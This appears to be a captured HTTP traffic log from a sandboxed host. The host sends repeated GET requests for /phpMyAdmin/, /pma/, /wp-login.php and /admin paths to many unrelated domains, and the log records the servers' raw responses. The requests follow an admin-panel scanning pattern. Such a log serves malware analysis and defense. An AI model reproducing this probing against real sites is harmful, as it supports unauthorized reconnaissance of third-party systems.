Nov 30, 2023 11:22:41.959606886 CET	418	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-17.ec2.internal X-Request-Id: 86aa2d4c-8baf-4e4a-967d-5b00fc002a54 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	62716	104.247.82.52	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.881947994 CET	220	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.056803942 CET	1340	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OryS90fDuw5HRfUC+RSvZIc0+t3X172t7f1JoXKu9xQDy1z9T1H9f8x/UOczLxgwrbgpFXewxy1784vGFWJobA== Accept-CH: viewport-width Accept-CH: dpr Accept-CH: device-memory Accept-CH: rtt Accept-CH: downlink Accept-CH: ect Accept-CH: ua Accept-CH: ua-full-version Accept-CH: ua-platform Accept-CH: ua-platform-version Accept-CH: ua-arch Accept-CH: ua-model Accept-CH: ua-mobile Accept-CH-Lifetime: 30 X-Domain: cm.cz X-Subdomain: Content-Encoding: gzip Data Raw: 37 65 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 e5 5b eb 76 da c8 b2 fe 1d 3f 85 42 d6 36 f8 0c 37 81 ef b6 9c 8d 8d 1d db 09 38 b6 71 6c 9c 35 27 4b 48 0d 08 84 c4 96 84 01 67 e7 01 ce 73 9d 17 3b 5f 75 b7 6e 80 93 c9 ec c9 fc 39 24 06 d4 5d dd 55 5d b7 ae ae 6a 0e 5f d7 af 4e 5a ed 8f a7 4a 3f 18 d9 47 6b 87 f4 a1 98 7a a0 17 74 b3 63 bb c6 70 c8 e6 5a a6 71 36 9d d6 af db 97 ef dd c7 8b fe 93 d1 ac 5d 9f 1e 1f 5f d7 ea b7 d3 da f4 b6 76 79 5c fb f0 af 49 fd ec b4 f5 70 e3 94 cf bd f2 56 f7 ee e3 ce e9 65 6b 67 67 d6 76 3e 8e 6e 3a e3 c6 7c f3 69 b8 fb be 6d 9d 3b c3 e6 98 99 ce e0 aa d6 bc 34 f4 87 fa 83 f1 fe fa b2 59 76 1e de 3f 5e 7e d8 69 19 d6 65 7d b7 e6 9e 3f bc 57 b7 76 4f 6a d3 d3 5a ed 5a d3 be 5c 79 f3 db bd 72 b7 3e 99 6e 9d df 74 ef 4e 7e bb b9 7d 7a bc 30 ca bf 05 d5 07 75 a7 12 ec 74 d5 4b f7 e1 fd 64 6f 76 5d 9f ab cf 7b 2d f5 7c af bb 3b 2b dd 5d 19 cf 1f 66 bd a9 d7 e9 8d cf 1e d8 74 36 57 77 76 37 9f de 9d dd 5f ba 9d 9a a6 65 94 d9 c8 76 7c 2d d3 0f 82 f1 7e a9 34 9d 4e 8b d3 6a d1 f5 7a 25 75 6f 6f af 34 23 7e 70 a0 7d 5b 77 7a 5a 86 39 19 25 fa 46 fc 62 ba 79 b4 a6 e0 75 38 62 81 0e 36 06 e3 02 fb d7 c4 7a d2 32 27 ae 13 30 27 28 b4 e6 63 96 51 0c f1 a4 65 02 36 0b 4a 34 ef 81 62 f4 75 cf 67 81 36 09 ba 85 dd 4c 29 39 91 a3 8f 98 96 79 b2 d8 74 ec 7a 41 62 f8 d4 32 83 be 66 b2 27 cb 60 05 fe 90 57 2c c7 0a 2c dd 2e f8 86 6e 33 4d cd 2b 7e df b3 9c 61 21 70 0b 5d 2b d0 1c 37 9a 3b b0 02 9b 1d 19 a3 a2 f1 7c 58 12 0f 82 7a df f0 ac 71 a0 f8 9e a1 65 04 1f 7a ae Data Ascii: 7e5[v?B678ql5'KHgs;_un9$]U]j_NZJ?GkztcpZq6]_vy\IpVekggv>n:\|im;4Yv?^~ie}?WvOjZZ\yr>ntN~}z0utKdov]{-\|;+]ft6Wwv7_ev\|-~4Njz%uoo4#~p}[wzZ9%Fbyu8b6z2'0'(cQe6J4bug6L)9ytzAb2f'`W,,.n3M+~a!p]+7;\|Xzqez
Nov 30, 2023 11:22:42.056818008 CET	1340	IN	Data Raw: db b3 59 d1 70 47 25 dd f4 99 e3 b3 92 e9 8e 74 cb f1 4b 86 de 2d 0e fc b7 7a 67 ac a9 99 a3 c3 92 18 7c c4 d9 e0 07 73 9b 29 23 66 5a ba 96 41 07 03 cb 8e d6 8a ba 8f 85 7e f1 03 dd 2b 2b 5f d7 5e 75 74 63 d8 f3 dc 89 63 ee 2b 13 cf ce 65 4b 25 Data Ascii: YpG%tK-zg\|s)#fZA~++_^utcc+eK%;=Rw:OIRg#4~SY(W-ZgVM\|\-}[KEDH;$iZNI1l>mz}E'f3W'hz
Nov 30, 2023 11:22:42.056828022 CET	294	IN	Data Raw: 31 33 0a 0e 7c 3d 9c 70 33 5f 3a 38 36 0f a1 54 af 5e bd aa 5f 35 fe f7 7f 9a 35 05 ff 3f de 5c d5 4f 2f d7 5e 1d 96 74 9c a6 4b d0 43 79 08 5e d6 c8 8a d4 48 a2 6f 85 c2 56 13 dd 8b 20 22 d0 ca 28 b4 7a 41 23 91 98 18 70 d8 57 c3 43 31 be 71 89 Data Ascii: 13\|=p3_:86T^_55?\O/^tKCy^HoV "(zA#pWC1q%8 U`8ZSnJ@$Fb\X)W;s+J:jC"W:ok\.k9XnFq2;-ct>')o+Y\S:mwFU<m7Z?Gtt)<
Nov 30, 2023 11:22:42.056936026 CET	1340	IN	Data Raw: 66 33 63 0d 0a ce f0 c1 c4 d7 e6 cc 47 af 6b 8b d6 ec 06 42 13 63 e2 e7 36 22 e5 4c a3 92 ab ff 28 e8 51 3e 72 fc d0 1c 52 9f c4 1a e3 af c4 48 c9 57 f9 01 97 26 92 1d 01 12 33 32 1f 13 f3 42 e4 77 26 7a 0f 5d 97 e0 d0 2d 87 95 68 9f 74 4f 09 0c Data Ascii: f3cGkBc6"L(Q>rRHW&32Bw&z]-htO~fSJ5>q68{#rs3J60b{'Dzq&I6\|Qd:W5F3:bS7@is%#,$gu&t\|nu32iQVd'9?1i]Mt:\%eX"1\|
Nov 30, 2023 11:22:42.056947947 CET	1340	IN	Data Raw: c3 b7 0f bc 59 5d 25 f7 3a 1a 9f ec 21 88 c0 0b 13 e4 21 3c 7d 92 6e 33 d4 d5 34 9c ff 0d ae 8d 45 1c ab 4e 6d 14 c5 90 39 9d 5f 98 31 7d 1b 89 1e ff 78 de d2 7b b4 4b e5 b2 56 d7 c3 67 76 e3 73 f9 77 11 78 2c ce 0f 1c a4 c8 97 b7 57 cd 22 82 4b Data Ascii: Y]%:!!<}n34ENm9_1}x{KVgvswx,W"KHV_'?emJ0lu#qQPvj3MbM4%5fRpfA!u&Rr/rXrIW\|[o<9}%<ov.sD N6V>2Y.loq5K)-P/D.
Nov 30, 2023 11:22:42.056955099 CET	108	IN	Data Raw: 57 b4 53 68 24 87 88 1f 61 19 2a 1d 98 ca 7b dc 60 0e bf 15 19 5e be 4d 51 81 5f 20 9a 73 fa 61 02 55 49 8e d6 fe 0f fe c8 ce 0b 2f 41 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: WSh$a*{`^MQ_ saUI/A0
Nov 30, 2023 11:22:42.056962967 CET	1340	IN	Data Raw: 57 29 c4 cc a2 6e ba 11 4e c2 77 3d 21 88 78 19 49 e9 89 3e 9a e1 b5 04 88 c6 12 2e 2a 9a 75 71 44 cd 11 ba d4 3c a2 52 9f 79 77 da ca e4 e9 4a 7d 5e a4 47 25 50 7a 0d b8 79 ed 98 39 d2 09 74 43 d7 53 cb 49 a1 90 69 cb 3f b6 22 82 02 e6 e8 1c 92 Data Ascii: W)nNw=!xI>.*uqD<RywJ}^G%Pzy9tCSIi?"NtyH7@?%@\<R+sVo"5U"_Dt 2s-dC"Due9$kgL3V@S-$g+nF6@hd

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	63037	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.896097898 CET	226	OUT	GET /wp-login.php HTTP/1.1 Host: onlist.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.010432959 CET	569	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.onlist.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.139992723=30fde576-b761-4503-9a2e-eb69ea07d855; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:14 GMT Connection: close Content-Length: 139 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 6f 6e 6c 69 73 74 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.onlist.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
150	192.168.2.4	62791	104.247.82.52	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.909495115 CET	218	OUT	GET /admin.php HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.062705994 CET	1340	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ktuuJHA5v/PeGH/itudKoasvXhiRWR5b8NZwT78Bfy3/yDe9E5jVcraqQ6UT9ZRw9liVt+4+ECP0lW84oEricg== Accept-CH: viewport-width Accept-CH: dpr Accept-CH: device-memory Accept-CH: rtt Accept-CH: downlink Accept-CH: ect Accept-CH: ua Accept-CH: ua-full-version Accept-CH: ua-platform Accept-CH: ua-platform-version Accept-CH: ua-arch Accept-CH: ua-model Accept-CH: ua-mobile Accept-CH-Lifetime: 30 X-Domain: cm.cz X-Subdomain: Content-Encoding: gzip Data Raw: 31 36 37 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5b eb 76 da c8 b2 fe 1d 3f 85 42 d6 36 f8 0c 77 7c 77 e4 1c 1c ec d8 4e c0 97 90 8b c9 ca c9 12 52 03 02 21 31 92 30 e0 ec 3c c0 79 ae fd 62 fb ab ee 96 d4 02 9c 4c 66 67 e6 d7 66 26 06 75 57 77 55 d7 ad ab aa 5b cf 9f 36 ae 5e b6 ef ae 4f b5 41 38 76 8e 37 9e d3 97 66 19 a1 51 30 ac ae e3 99 a3 11 5b e8 99 e6 d9 6c d6 b8 b9 bb 7c ed 75 2e 06 f7 66 ab 7e 73 7a 72 72 53 6f bc 9d d5 67 6f eb 97 27 f5 37 bf 4f 1b 67 a7 ed 8f b7 6e f9 dc 2f ef f4 de 5d ef 9d 5e b6 f7 f6 e6 77 ee f5 f8 b6 3b 69 2e b6 ef 47 fb af ef ec 73 77 d4 9a 30 cb 1d 5e d5 5b 97 a6 f1 b1 f1 d1 7c 7d 73 d9 2a bb 1f 5f 77 2e df ec b5 4d fb b2 b1 5f f7 ce 3f be ae ec ec bf ac cf 4e eb f5 1b 5d ff 32 0a a7 d3 cb f3 fa ce 7d e9 9a bd 3a 2f d9 e1 d4 7a ed 19 c1 fd c7 81 7d fb e1 76 a7 bb df ea cc da 7b fb 27 bd 45 ad b4 68 b0 83 d3 9d e1 7b d3 37 7e bf d9 7d d7 3e e8 dc ce 0e 1c fb 7d f8 db f6 6f a7 2f af cb ce 87 fd 6d ef d4 b7 cd be ae 67 b4 f9 d8 71 03 3d 33 08 c3 c9 61 a9 34 9b cd 8a b3 5a d1 f3 fb a5 ca c1 c1 41 69 4e fc e0 40 87 8e e1 f6 f5 0c 73 33 5a fc 8b f8 c5 0c eb 78 43 c3 e7 f9 98 85 06 d8 18 4e 0a ec f7 a9 7d af 67 5e 7a 6e c8 dc b0 d0 5e 4c 58 46 33 c5 93 9e 09 d9 3c 2c d1 bc 47 9a 39 30 fc 80 85 fa 34 ec 15 f6 33 25 75 22 d7 18 33 3d 73 6f b3 d9 c4 f3 43 65 f8 cc b6 c2 81 6e b1 7b db 64 05 fe 90 d7 6c d7 0e 6d c3 29 04 a6 e1 30 bd 92 d7 82 81 6f bb a3 42 e8 15 7a 76 a8 bb 5e 3c 77 68 87 0e 3b 36 c7 45 f3 e1 79 49 3c 08 ea 03 d3 b7 27 a1 16 f8 a6 9e 11 7c Data Ascii: 167e[v?B6w\|wNR!10<ybLfgf&uWwU[6^OA8v7fQ0[l\|u.f~szrrSogo'7Ogn/]^w;i.Gsw0^[\|}s*_w.M_?N]2}:/z}v{'Eh{7~}>}o/mgq=3a4ZAiN@s3ZxCN}g^zn^LXF3<,G9043%u"3=soCen{dlm)0oBzv^<wh;6EyI<'\|
Nov 30, 2023 11:22:42.062720060 CET	1340	IN	Data Raw: e8 7b 5e df 61 45 d3 1b 97 0c 2b 60 6e c0 4a 96 37 36 6c 37 28 99 46 af 38 0c 5e 18 dd 89 5e c9 1c 3f 2f 89 c1 c7 9c 0d 41 b8 70 98 36 66 96 6d e8 19 74 30 b0 ec 78 a3 68 04 58 e8 97 20 34 fc b2 f6 75 e3 49 d7 30 47 7d df 9b ba d6 a1 36 f5 9d 5c Data Ascii: {^aE+`nJ76l7(F8^^?/Ap6fmt0xhX 4uI0G}6\Tjw^~>-7z>VtYXl&(y}\3BP&s<xG&8eG6T"+_I/"!wGD,\|)];`[#Do4 \|olw5
Nov 30, 2023 11:22:42.062728882 CET	1340	IN	Data Raw: 39 66 46 43 c2 d7 47 86 9b f9 d2 45 da 3c 82 52 3d 79 f2 a4 71 d5 fc d7 ff b7 ea 1a fe bf be bd 6a 9c 5e 6e 3c 79 5e 32 90 4d 97 a0 87 32 09 5e d5 c8 aa d4 48 a2 6f 8d c2 d6 94 ee 65 10 11 68 65 34 5a bd a0 91 48 54 06 3c 1f 54 a2 a4 18 bf b8 c4 Data Ascii: 9fFCGE<R=yqj^n<y^2M2^Hoehe4ZHT<Tbb(DE2IP&%tb\X-WkKoVhj-C\|"_:6b{C{r/@M\|(R"0nuA9/Vyn*.;>Jy4
Nov 30, 2023 11:22:42.062751055 CET	1340	IN	Data Raw: 45 7f b7 db f3 c7 cc a7 39 98 55 f7 fb 53 da 29 82 64 86 18 d7 d5 84 f6 45 ea f9 ca 9d 4c 76 32 ed 5e 58 e4 78 ac 09 2a 7e a8 62 d2 91 04 0e 30 ca 15 e9 ae b0 d1 07 70 29 c1 35 28 3d 31 02 f6 ce 77 08 7c 3d ff b3 a5 17 61 a0 47 23 c9 b5 9e f1 c2 Data Ascii: E9US)dELv2^Xx*~b0p)5(=1w\|=aG#(iS166jizECo.6){.#"[;GE F&9kgOsC8.<7y9tM:yR? T=-4
Nov 30, 2023 11:22:42.062761068 CET	1340	IN	Data Raw: eb 52 7c 36 64 26 82 f7 3f bb 1e b1 16 ba 99 c1 2b 7c 73 44 1f 51 d4 a2 e5 bc ee 10 57 ab f1 b7 1a e9 a9 12 ea 50 27 c5 56 19 fc 00 09 99 24 3f e2 3d a8 0f e2 b8 87 cb 99 ae 6c 50 d5 41 c3 d5 7a 4a c9 f9 84 b1 06 10 f4 27 f4 7c 06 6a ea e1 bf e5 Data Ascii: R\|6d&?+\|sDQWP'V$?=lPAzJ'\|jHS"cP\|Casa*w8"fJl(YYNFFn{zjIUwp?^qv2"ah3jOoCLg\|m^uhtbZ%%Z~A4f\|MGj!bfqnMw=!
Nov 30, 2023 11:22:42.062769890 CET	174	IN	Data Raw: 2a e5 5d 6b 77 af 56 b6 58 b5 82 e5 25 6a 9c 72 bf 59 7a d9 a1 94 dc 98 16 d7 2b 89 05 f4 66 3c bf 39 9d 4d 6e 4e 67 8f 97 9c f3 57 ba 01 82 97 48 2f ac cc 61 a5 b2 bb 57 dd dd af 54 aa df 1e 45 27 5e 98 4f d0 3d 76 41 3b 85 46 72 88 f8 11 1d 42 Data Ascii: ]kwVX%jrYz+f<9MnNgWH/aWTE'^O=vA;FrBRyw")x0-A
Nov 30, 2023 11:22:42.062786102 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
151	192.168.2.4	62881	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.910307884 CET	221	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.091033936 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
152	192.168.2.4	62894	64.190.63.111	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.921562910 CET	223	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: apee.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.112490892 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:22:42 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port
153	192.168.2.4	62914	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.927592993 CET	222	OUT	GET /pma/ HTTP/1.1 Host: gcann.cr.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.114938021 CET	347	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 61 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 63 61 6e 6e 2e 63 72 2e 63 6f 2e 75 6b 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4a <meta http-equiv='refresh' content='0; url=http://gcann.cr.co.uk/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
154	192.168.2.4	63041	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:41.978024960 CET	221	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.157696962 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
155	192.168.2.4	63018	3.64.163.50	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.034341097 CET	216	OUT	GET /pma/ HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.225783110 CET	341	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 34 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 62 79 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>44 <meta http-equiv='refresh' content='0; url=http://gbya.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
156	192.168.2.4	62533	199.59.243.225	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.039818048 CET	214	OUT	GET /admin HTTP/1.1 Host: ia.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.139393091 CET	1254	IN	HTTP/1.1 200 OK date: Thu, 30 Nov 2023 10:22:41 GMT content-type: text/html; charset=utf-8 content-length: 997 x-request-id: f7325a83-db9f-4f42-8c05-566c7d8be59a cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nVo9J6mOWI2cCIexsXGEFM/D8JwvIiB8T/uwEf5GsJurgdjSh/dFEDa0UpncEb8b+6rbI1jAk9+OnvT7NMr9wQ== set-cookie: parking_session=f7325a83-db9f-4f42-8c05-566c7d8be59a; expires=Thu, 30 Nov 2023 10:37:42 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 56 6f 39 4a 36 6d 4f 57 49 32 63 43 49 65 78 73 58 47 45 46 4d 2f 44 38 4a 77 76 49 69 42 38 54 2f 75 77 45 66 35 47 73 4a 75 72 67 64 6a 53 68 2f 64 46 45 44 61 30 55 70 6e 63 45 62 38 62 2b 36 72 62 49 31 6a 41 6b 39 2b 4f 6e 76 54 37 4e 4d 72 39 77 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nVo9J6mOWI2cCIexsXGEFM/D8JwvIiB8T/uwEf5GsJurgdjSh/dFEDa0UpncEb8b+6rbI1jAk9+OnvT7NMr9wQ==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link r
